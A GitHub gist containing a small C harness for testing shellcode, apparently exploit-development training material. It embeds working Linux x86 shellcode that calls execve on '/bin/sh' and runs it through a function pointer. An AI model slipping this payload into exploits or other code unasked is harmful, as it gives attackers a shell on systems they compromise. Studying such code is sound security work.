Skip to content

Instantly share code, notes, and snippets.

@jpedro
Forked from securitytube/shellcode.c
Created November 16, 2017 01:24
Show Gist options
  • Save jpedro/029c4f8f1ca26c6866b0b06bd435b03c to your computer and use it in GitHub Desktop.
Save jpedro/029c4f8f1ca26c6866b0b06bd435b03c to your computer and use it in GitHub Desktop.
C Program to test shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment